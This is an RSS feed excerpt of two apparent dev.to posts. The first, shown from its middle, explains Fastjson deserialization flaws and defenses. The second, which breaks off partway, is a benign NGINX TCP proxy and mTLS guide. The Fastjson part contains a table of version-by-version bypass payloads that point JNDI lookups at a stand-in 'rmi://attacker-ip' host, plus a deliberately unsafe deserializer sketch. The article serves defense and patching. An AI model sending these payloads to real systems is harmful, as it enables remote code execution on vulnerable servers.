&lt;li&gt;  &lt;strong&gt;Automatic Setter Invocation&lt;/strong&gt;: During deserialization, Fastjson automatically calls the setter methods of all object properties. Even for private properties, adding &lt;code&gt;Feature.SupportNonPublicField&lt;/code&gt; enables this invocation.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;JNDI Injection&lt;/strong&gt;: Classes like &lt;code&gt;JdbcRowSetImpl&lt;/code&gt; initiate JNDI queries in their &lt;code&gt;setDataSourceName&lt;/code&gt; method. If an attacker-controlled RMI/LDAP address is passed, the server will load remote malicious classes and execute malicious code.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  II. Practical Guide to Fastjson’s Key APIs: Serialization &amp;amp; Deserialization
&lt;/h2&gt;

&lt;p&gt;Before analyzing vulnerabilities, it’s critical to understand Fastjson’s core API usage—this forms the basis for identifying exploit scenarios.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Dependency Configuration (Vulnerable vs. Secure Versions)
&lt;/h3&gt;

&lt;p&gt;First, a critical note: &lt;strong&gt;All 1.x versions below 1.2.83 and 2.x versions below 2.0.45 have security risks&lt;/strong&gt;. Vulnerable versions must be avoided in production.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!-- Dangerous: Versions like 1.2.24 (CVE-2017-18349) and 1.2.47 (cache bypass vulnerability) --&amp;gt;
&amp;lt;dependency&amp;gt;
    &amp;lt;groupId&amp;gt;com.alibaba&amp;lt;/groupId&amp;gt;
    &amp;lt;artifactId&amp;gt;fastjson&amp;lt;/artifactId&amp;gt;
    &amp;lt;version&amp;gt;1.2.47&amp;lt;/version&amp;gt; &amp;lt;!-- Vulnerable version: DO NOT USE --&amp;gt;
&amp;lt;/dependency&amp;gt;

&amp;lt;!-- Secure: Recommend 1.2.83+ for 1.x, 2.0.45+ for 2.x --&amp;gt;
&amp;lt;dependency&amp;gt;
    &amp;lt;groupId&amp;gt;com.alibaba&amp;lt;/groupId&amp;gt;
    &amp;lt;artifactId&amp;gt;fastjson&amp;lt;/artifactId&amp;gt;
    &amp;lt;version&amp;gt;1.2.83&amp;lt;/version&amp;gt; &amp;lt;!-- Patched version with all known vulnerabilities fixed --&amp;gt;
&amp;lt;/dependency&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.2 Hands-On with Core APIs: Using the &lt;code&gt;User&lt;/code&gt; Class
&lt;/h3&gt;

&lt;p&gt;We first define a &lt;code&gt;User&lt;/code&gt; class with print statements in getters/setters to visually demonstrate when methods are invoked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package org.example;

public class User {
    private String name;
    private int age;

    // No-arg constructor (required for deserialization; errors occur without it)
    public User() {}

    // Parameterized constructor
    public User(String name, int age) {
        this.name = name;
        this.age = age;
    }

    // Getter: Automatically called during serialization (to read property values)
    public String getName() {
        System.out.println("Triggered getName(): Reading 'name' for serialization");
        return name;
    }

    // Setter: Automatically called during deserialization (to inject property values)
    public void setName(String name) {
        System.out.println("Triggered setName(): Injecting 'name' for deserialization");
        this.name = name;
    }

    // Omitted getter/setter for 'age' (logic matches above)
    public int getAge() { return age; }
    public void setAge(int age) { this.age = age; }

    @Override
    public String toString() {
        return "User{name='" + name + "', age=" + age + "}";
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2.2.1 Serialization: Convert Java Objects to JSON
&lt;/h4&gt;

&lt;p&gt;The core method is &lt;code&gt;JSON.toJSONString()&lt;/code&gt;, with critical configuration in &lt;code&gt;SerializerFeature&lt;/code&gt; (e.g., &lt;code&gt;WriteClassName&lt;/code&gt; adds the &lt;code&gt;@type&lt;/code&gt; field—this poses hidden risks for deserialization vulnerabilities).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;public class FastjsonDemo {public static void main(String[] args) {User user = new User("Zhang San", 25);

        // 1. Basic serialization: No @type field
        String basicJson = JSON.toJSONString(user);
        System.out.println("Basic serialization result:" + basicJson);
        // Output: Triggered getName(): Reading 'name' for serialization → Basic serialization result: {"age":25,"name":"Zhang San"}

        // 2. Serialization with @type (enable WriteClassName)
        String withTypeJson = JSON.toJSONString(
            user, 
            SerializerFeature.WriteClassName, // Add @type field
            SerializerFeature.PrettyFormat    // Format output for readability
        );
        System.out.println("Serialization with @type:\n" + withTypeJson);
        // Output: Triggered getName() → Serialization with @type:
        // {
        //     "@type":"org.example.User",
        //     "age":25,
        //     "name":"Zhang San"
        // }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2.2.2 Deserialization: Convert JSON to Java Objects
&lt;/h4&gt;

&lt;p&gt;The core method is &lt;code&gt;JSON.parseObject()&lt;/code&gt;, with risks concentrated in &lt;code&gt;Feature.SupportAutoType&lt;/code&gt; (enables &lt;code&gt;@type&lt;/code&gt; parsing when activated) and &lt;code&gt;Feature.SupportNonPublicField&lt;/code&gt; (allows injection of private properties).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;public class FastjsonDemo {public static void main(String[] args) {String json = "{"@type":"org.example.User","age":25,"name":"Zhang San"}";

        // 1. Basic deserialization: Specify target class
        User user1 = JSON.parseObject(json, User.class);
        System.out.println("Basic deserialization result:" + user1);
        // Output: Triggered setName(): Injecting 'name' for deserialization → Basic deserialization result: User{name='Zhang San', age=25}

        // 2. Enable AutoType (HIGH RISK! DO NOT use in production)
        User user2 = JSON.parseObject(
            json, 
            User.class, 
            Feature.SupportAutoType // Explicitly enable AutoType (extremely risky)
        );
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  III. Vulnerabilities &amp;amp; Bypass Techniques Across Versions: From 1.2.24 to 1.2.80
&lt;/h2&gt;

&lt;p&gt;Fastjson’s developers have repeatedly patched vulnerabilities, but attackers continue to find bypass methods. The table below summarizes key vulnerabilities and practical payloads for each version—essential references for vulnerability detection and defense.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Affected Versions&lt;/th&gt;
&lt;th&gt;Vulnerability Type&lt;/th&gt;
&lt;th&gt;Core Bypass Technique&lt;/th&gt;
&lt;th&gt;Practical Payload (Key Snippet)&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1.2.24 and earlier&lt;/td&gt;
&lt;td&gt;Deserialization RCE&lt;/td&gt;
&lt;td&gt;AutoType enabled by default; no blacklist&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker-ip:1099/malicious-class","autoCommit":true}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No extra configuration; triggers JNDI injection directly&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.25 ~ 1.2.41&lt;/td&gt;
&lt;td&gt;Blacklist Bypass (L;)&lt;/td&gt;
&lt;td&gt;Use JVM type descriptor (L-prefixed, ;-suffixed)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://attacker-ip:1099/malicious-class","autoCommit":true}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requires server to enable &lt;code&gt;setAutoTypeSupport(true)&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.42&lt;/td&gt;
&lt;td&gt;Double L; Bypass&lt;/td&gt;
&lt;td&gt;Double L and ; (LL…;;)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://attacker-ip:1099/malicious-class","autoCommit":true}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Exploits single-filter flaw; auto-truncates after double characters&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.43&lt;/td&gt;
&lt;td&gt;[Symbol Bypass&lt;/td&gt;
&lt;td&gt;Prefix class name with [, suffix with [{ to close&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"[com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"[{,"_bytecodes":["Base64-encoded malicious bytecode"]}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requires &lt;code&gt;Feature.SupportNonPublicField&lt;/code&gt; to inject private properties&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.45&lt;/td&gt;
&lt;td&gt;MyBatis Class Bypass&lt;/td&gt;
&lt;td&gt;Exploit &lt;code&gt;JndiDataSourceFactory&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://attacker-ip:1099/malicious-class"}}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requires MyBatis dependency in the project&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.47 and earlier&lt;/td&gt;
&lt;td&gt;Cache Poisoning Bypass&lt;/td&gt;
&lt;td&gt;Cache malicious class in _classMappings first&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker-ip:1099/malicious-class"}}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AutoType not required; cache skips blacklist checks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.80 and earlier&lt;/td&gt;
&lt;td&gt;$ref Reference Chain Bypass&lt;/td&gt;
&lt;td&gt;Use $ref to construct exception object chain&lt;/td&gt;
&lt;td&gt;(CVE-2022-25845) &lt;code&gt;{"@type":"java.lang.Exception","@ref":"$..xx"}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Triggers class loading via exception handling logic&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
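&lt;p&gt;The descriptor-based rows above work because early patches compared the raw &lt;code&gt;@type&lt;/code&gt; string against the blacklist, while class resolution also accepts JVM descriptor syntax (&lt;code&gt;L…;&lt;/code&gt;). A minimal Python sketch of the stripping idea (illustrative only, not Fastjson’s actual code) shows why a single-pass filter fails against doubled wrappers:&lt;/p&gt;

```python
def strip_descriptor(name: str) -> str:
    # JVM descriptor form "Lcom.example.Foo;" denotes the class com.example.Foo.
    # Stripping layer by layer shows the 1.2.42 flaw: a filter that removes
    # only ONE "L"/";" pair still leaves "LL...;;" resolvable to a real class.
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name
```

&lt;p&gt;For example, &lt;code&gt;strip_descriptor("LLcom.sun.rowset.JdbcRowSetImpl;;")&lt;/code&gt; reduces to the plain class name, which is exactly what the doubled payload relied on.&lt;/p&gt;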

&lt;h3&gt;
  
  
  Key Bypass Analysis (Cache Poisoning in 1.2.47)
&lt;/h3&gt;

&lt;p&gt;This is one of the most dangerous bypass methods—it &lt;strong&gt;does not require AutoType activation&lt;/strong&gt; and bypasses blacklists solely via caching. The core logic is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; First JSON object (a): Use the &lt;code&gt;val&lt;/code&gt; field of &lt;code&gt;java.lang.Class&lt;/code&gt; to store &lt;code&gt;com.sun.rowset.JdbcRowSetImpl&lt;/code&gt; in Fastjson’s &lt;code&gt;_classMappings&lt;/code&gt; cache.&lt;/li&gt;
&lt;li&gt; Second JSON object (b): Directly specify the cached class via &lt;code&gt;@type&lt;/code&gt;. Fastjson skips blacklist checks, loads the class, and triggers JNDI injection.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In practice, attackers only need to send the above JSON string. If the target server uses version 1.2.47 or earlier, malicious code will execute.&lt;/p&gt;
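&lt;p&gt;Whatever the specific bypass, the root hazard is the same: a class name taken from untrusted input drives class loading and setter invocation. The anti-pattern can be sketched language-agnostically; the Python below is hypothetical illustration code, not Fastjson itself:&lt;/p&gt;

```python
import importlib
import json

def unsafe_parse(payload: str):
    """Deliberately unsafe: mimics AutoType-style polymorphic deserialization."""
    obj = json.loads(payload)
    type_name = obj.pop("@type", None)
    if type_name is None:
        return obj
    module_name, _, class_name = type_name.rpartition(".")
    cls = getattr(importlib.import_module(module_name), class_name)  # attacker chooses the class
    instance = cls()  # constructor runs attacker-chosen code paths
    for key, value in obj.items():
        setattr(instance, key, value)  # property injection (Fastjson invokes setters)
    return instance
```

&lt;p&gt;Any loadable class whose constructor or setters have side effects becomes a gadget; in the Java case, &lt;code&gt;JdbcRowSetImpl&lt;/code&gt;’s &lt;code&gt;setDataSourceName()&lt;/code&gt; and &lt;code&gt;setAutoCommit()&lt;/code&gt; are what turn property injection into a JNDI lookup.&lt;/p&gt;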

&lt;h2&gt;
  
  
  IV. Enterprise-Grade Defense Strategies: Block Vulnerabilities at the Source
&lt;/h2&gt;

&lt;p&gt;Defense against Fastjson vulnerabilities centers on &lt;strong&gt;disabling risky features + timely updates + strict validation&lt;/strong&gt;. Below are four key, actionable measures:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Upgrade to a Secure Version (Mandatory)
&lt;/h3&gt;

&lt;p&gt;This is the most fundamental defense. According to official announcements:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  For 1.x series: Upgrade to &lt;strong&gt;1.2.83 or later&lt;/strong&gt; (patches all known bypass vulnerabilities).&lt;/li&gt;
&lt;li&gt;  For 2.x series: Upgrade to &lt;strong&gt;2.0.45 or later&lt;/strong&gt; (the 2.x series redesigned the AutoType mechanism for enhanced security).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2. Disable the AutoType Mechanism (Critical Configuration)
&lt;/h3&gt;

&lt;p&gt;Even after upgrading, disable AutoType unless absolutely necessary. There are 3 configuration methods:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Code Configuration&lt;/strong&gt; (global effect; blocks &lt;code&gt;@type&lt;/code&gt; parsing): &lt;code&gt;ParserConfig.getGlobalInstance().setAutoTypeSupport(false);&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;JVM Parameter Configuration&lt;/strong&gt; (takes effect at startup): &lt;code&gt;-Dfastjson.autoTypeSupport=false&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Configuration File&lt;/strong&gt; (for frameworks like Spring): add &lt;code&gt;fastjson.autoTypeSupport=false&lt;/code&gt; to &lt;code&gt;application.properties&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3. Enable SafeMode (Completely Block AutoType)
&lt;/h3&gt;

&lt;p&gt;If your business does not require AutoType, enable &lt;strong&gt;SafeMode&lt;/strong&gt;. This completely disables &lt;code&gt;@type&lt;/code&gt; parsing—even with whitelists configured, custom classes cannot be loaded.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Enable SafeMode to fundamentally disable AutoType
ParserConfig.getGlobalInstance().setSafeMode(true);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4. Whitelist Configuration (If Absolutely Necessary)
&lt;/h3&gt;

&lt;p&gt;If your business must enable AutoType, configure a strict whitelist (only allow specified classes to be parsed) and avoid wildcards (e.g., &lt;code&gt;com.company.*&lt;/code&gt;).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ParserConfig config = ParserConfig.getGlobalInstance();
// Add whitelist: Only allow classes under org.example
config.addAccept("org.example.");
// Avoid blacklists (easily bypassed; prioritize whitelists)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
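&lt;p&gt;The accept rule is a plain prefix match against the &lt;code&gt;@type&lt;/code&gt; value: deny by default, allow only what is listed. A small sketch of that semantics (an illustration of the idea, not the library’s implementation):&lt;/p&gt;

```python
ALLOWED_PREFIXES = ("org.example.",)  # mirrors config.addAccept("org.example.")

def type_allowed(class_name: str) -> bool:
    # Deny by default; the trailing dot in the prefix matters, otherwise
    # a lookalike package such as org.exampleevil would slip through.
    return class_name.startswith(ALLOWED_PREFIXES)
```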



&lt;h2&gt;
  
  
  V. Frequently Asked Questions (FAQ)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Q1: Why is &lt;code&gt;Feature.SupportNonPublicField&lt;/code&gt; required for deserializing &lt;code&gt;TemplatesImpl&lt;/code&gt;?
&lt;/h3&gt;

&lt;p&gt;A: The &lt;code&gt;_bytecodes&lt;/code&gt; field of &lt;code&gt;TemplatesImpl&lt;/code&gt; (which stores malicious bytecode) is private. Fastjson does not parse private properties by default. Adding this feature allows injection of Base64-encoded malicious bytecode into &lt;code&gt;_bytecodes&lt;/code&gt;, triggering subsequent code execution.&lt;/p&gt;

&lt;h3&gt;
  
  
  Q2: Why must &lt;code&gt;@type&lt;/code&gt; be the first field in the JSON?
&lt;/h3&gt;

&lt;p&gt;A: Fastjson prioritizes processing the &lt;code&gt;@type&lt;/code&gt; field during parsing. If placed later, parsing other fields may trigger exceptions (e.g., type mismatch), preventing &lt;code&gt;@type&lt;/code&gt; from being processed and rendering the payload ineffective.&lt;/p&gt;

&lt;h3&gt;
  
  
  Q3: How to quickly check if a project uses a vulnerable Fastjson version?
&lt;/h3&gt;

&lt;p&gt;A: 1. Check the dependency version in &lt;code&gt;pom.xml&lt;/code&gt; or &lt;code&gt;build.gradle&lt;/code&gt;; 2. Use tools like the Maven Dependency Plugin to view the dependency tree:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mvn dependency:tree | grep fastjson
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
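&lt;p&gt;For auditing many modules at once, the grep can be scripted. The sketch below assumes the standard &lt;code&gt;mvn dependency:tree&lt;/code&gt; line format (&lt;code&gt;groupId:artifactId:packaging:version:scope&lt;/code&gt;) and only classifies the 1.x line, per the upgrade advice above:&lt;/p&gt;

```python
import re

SAFE_1X = (1, 2, 83)  # first patched 1.x release

def scan_dependency_tree(tree_output: str):
    """Flag fastjson 1.x versions below 1.2.83 in `mvn dependency:tree` output."""
    findings = []
    for match in re.finditer(r"com\.alibaba:fastjson:jar:([\d.]+)", tree_output):
        version = match.group(1)
        parts = tuple(int(p) for p in version.split("."))
        vulnerable = parts[0] == 1 and parts < SAFE_1X
        findings.append((version, vulnerable))
    return findings
```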



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Fastjson vulnerabilities arise from the combination of &lt;strong&gt;over-trusting user input&lt;/strong&gt; and &lt;strong&gt;security flaws in the AutoType mechanism&lt;/strong&gt;. For developers, there’s no need to deeply study every bypass technique—simply remember three principles: &lt;strong&gt;avoid vulnerable versions, disable AutoType, and enable SafeMode&lt;/strong&gt;. These measures block vulnerabilities at the source and prevent your systems from becoming attacker targets.&lt;/p&gt;

</description>
      <category>java</category>
      <category>fastjson</category>
      <category>deserialization</category>
    </item>
    <item>
      <title>NGINX Technical Practice: Configuration Guide for TCP Layer 4 Port Proxy and mTLS Mutual Encryption Authentication</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Sun, 23 Nov 2025 15:41:28 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/nginx-technical-practice-configuration-guide-for-tcp-layer-4-port-proxy-and-mtls-mutual-encryption-3flb</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/nginx-technical-practice-configuration-guide-for-tcp-layer-4-port-proxy-and-mtls-mutual-encryption-3flb</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This article systematically breaks down the complete implementation of Nginx TCP Layer 4 port proxy and mTLS mutual encryption authentication. It covers core technical principles (TLS/mTLS mechanisms), certificate generation (root CA/server/client workflows), Nginx configuration (Stream module, SSL parameter optimization), and function verification (valid/invalid connection testing) with practical commands. It helps DevOps engineers and developers quickly build secure communication channels, addressing risks like data leakage and unauthorized access in traditional proxy architectures, suitable for encrypted proxy scenarios of TCP services such as Redis and databases.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/nginx-technical-practice-configuration-guide-for-tcp-layer-4-port-proxy-and-mtls-mutual-encryption-authentication.html" rel="noopener noreferrer"&gt;# NGINX Technical Practice: Configuration Guide for TCP Layer 4 Port Proxy and mTLS Mutual Encryption Authentication&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Exploring the Technical Background
&lt;/h2&gt;

&lt;p&gt;In the process of digital transformation, network security and efficient proxy technology have become core components of modern network architectures. As enterprises scale and their business scenarios grow more complex, network communications face multiple security threats, such as man-in-the-middle attacks, data theft, and information tampering, placing higher demands on the security and reliability of communication architectures.&lt;/p&gt;

&lt;p&gt;Traditional network proxy solutions have limitations in addressing complex security scenarios. As a high-performance HTTP and reverse proxy server, Nginx occupies a crucial position in the proxy field due to its stability, efficiency, and rich functional modules. Nginx not only supports Layer 7 proxy for the HTTP protocol but also enables Layer 4 proxy for TCP and UDP protocols through the Stream module, providing a flexible and high-performance solution for network communications.&lt;/p&gt;

&lt;p&gt;mTLS (mutual TLS) mutual encryption authentication technology is a key means to ensure secure network communications. Traditional one-way TLS authentication only enables the client to authenticate the server’s identity, posing the risk of attackers impersonating legitimate servers to steal data. mTLS mutual authentication requires both communicating parties to verify each other’s identities. Through a certificate verification mechanism, it ensures the legitimacy of both parties’ identities, effectively preventing man-in-the-middle attacks and data leakage, and safeguarding the confidentiality, integrity, and availability of data transmission.&lt;/p&gt;

&lt;p&gt;In data-sensitive industries—such as scenarios like customer transaction information processing in the financial sector, private medical record transmission in the healthcare industry, and user information protection on e-commerce platforms—the combined application of Nginx TCP Layer 4 proxy and mTLS mutual authentication holds significant importance. This technical combination not only meets enterprises’ demands for network communication performance but also provides comprehensive protection for data security, serving as a core technical support for safeguarding network architecture security during enterprises’ digital transformation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdvsp0e3208u90yrihf78.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdvsp0e3208u90yrihf78.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Nginx Proxy for TCP Layer 4 Ports
&lt;/h2&gt;

&lt;h3&gt;
  
  
  2.1 Preparation
&lt;/h3&gt;

&lt;p&gt;Before configuring the Nginx TCP Layer 4 port proxy, ensure that Nginx has been installed on the server. For Ubuntu systems, the installation can be performed using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt update &amp;amp;&amp;amp; sudo apt install nginx -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For CentOS systems, the yum command is used for installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo yum install epel-release -y &amp;amp;&amp;amp; sudo yum install nginx -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Meanwhile, the OpenSSL dependency library must be installed to provide SSL/TLS encryption support, which is a prerequisite for the subsequent mTLS mutual authentication configuration. The installation command for Ubuntu systems is as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt install openssl -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Installation command for CentOS systems:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo yum install openssl -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After installation, run the &lt;code&gt;nginx -V&lt;/code&gt; command to check the Nginx compilation parameters and confirm whether the &lt;code&gt;--with-stream&lt;/code&gt; module is included. This module is the core component for implementing TCP/UDP Layer 4 proxy; if it is missing, Nginx needs to be recompiled with this parameter added.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Detailed Configuration Steps
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create a dedicated Stream configuration directory.&lt;/strong&gt; To keep the Nginx configuration clear and manageable, create a dedicated directory for Stream module configuration files:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo mkdir -p /etc/nginx/stream.d
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="2"&gt;
&lt;li&gt; &lt;strong&gt;Modify the main Nginx configuration file.&lt;/strong&gt; Edit &lt;code&gt;/etc/nginx/nginx.conf&lt;/code&gt; and add an include for the Stream configuration directory at the end of the file, so Nginx loads the TCP proxy configuration at startup:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Add the following content at the end of /etc/nginx/nginx.conf
stream {
    include /etc/nginx/stream.d/*.conf;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="3"&gt;
&lt;li&gt; &lt;strong&gt;Configure the TCP Layer 4 proxy.&lt;/strong&gt; Create a TCP proxy configuration file (e.g., &lt;code&gt;redis-proxy.conf&lt;/code&gt;) in the &lt;code&gt;/etc/nginx/stream.d&lt;/code&gt; directory. Taking a proxy for a Redis service (running on &lt;code&gt;192.168.1.100:6379&lt;/code&gt;) as an example, the configuration content is as follows:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;upstream redis_backend {
    server 192.168.1.100:6379; # Backend Redis service address and port
    keepalive 32; # Maintain persistent connections to improve performance
}

server {
    listen 6380; # Port on which Nginx listens for TCP requests
    proxy_pass redis_backend; # Forward requests to the backend upstream cluster
    proxy_timeout 300s; # Set the proxy connection timeout period
    proxy_buffer_size 16k; # Set the proxy buffer size
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 Configuration Example Demonstration
&lt;/h3&gt;

&lt;p&gt;After completing the configuration, verify the correctness of the Nginx configuration using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo nginx -t
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the output shows &lt;code&gt;nginx: configuration file /etc/nginx/nginx.conf test is successful&lt;/code&gt;, the configuration is valid. Then, reload the Nginx configuration to make the changes take effect:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo systemctl reload nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To confirm that the TCP proxy port is listening normally, run the &lt;code&gt;ss&lt;/code&gt; command to check the port status:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ss -tulnp | grep 6380
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the output includes &lt;code&gt;LISTEN 0 128 *:6380 *:* users:(("nginx",pid=xxxx,fd=xx))&lt;/code&gt;, it indicates that the Nginx TCP Layer 4 proxy has been started successfully.&lt;/p&gt;
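&lt;p&gt;The same liveness check can be scripted for monitoring. A minimal Python sketch (the address below is the example value from this section; a completed TCP handshake means something is listening on the port):&lt;/p&gt;

```python
import socket

def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    # TCP-level check, equivalent in spirit to `ss -tulnp | grep 6380`.
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

&lt;p&gt;For example, &lt;code&gt;port_is_open("192.168.1.200", 6380)&lt;/code&gt; should return &lt;code&gt;True&lt;/code&gt; once the proxy is up. Note this only proves the port accepts connections, not that mTLS or the backend is healthy.&lt;/p&gt;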

&lt;h2&gt;
  
  
  3. Enabling mTLS Mutual Encryption Authentication
&lt;/h2&gt;

&lt;h3&gt;
  
  
  3.1 Analysis of mTLS Principles
&lt;/h3&gt;

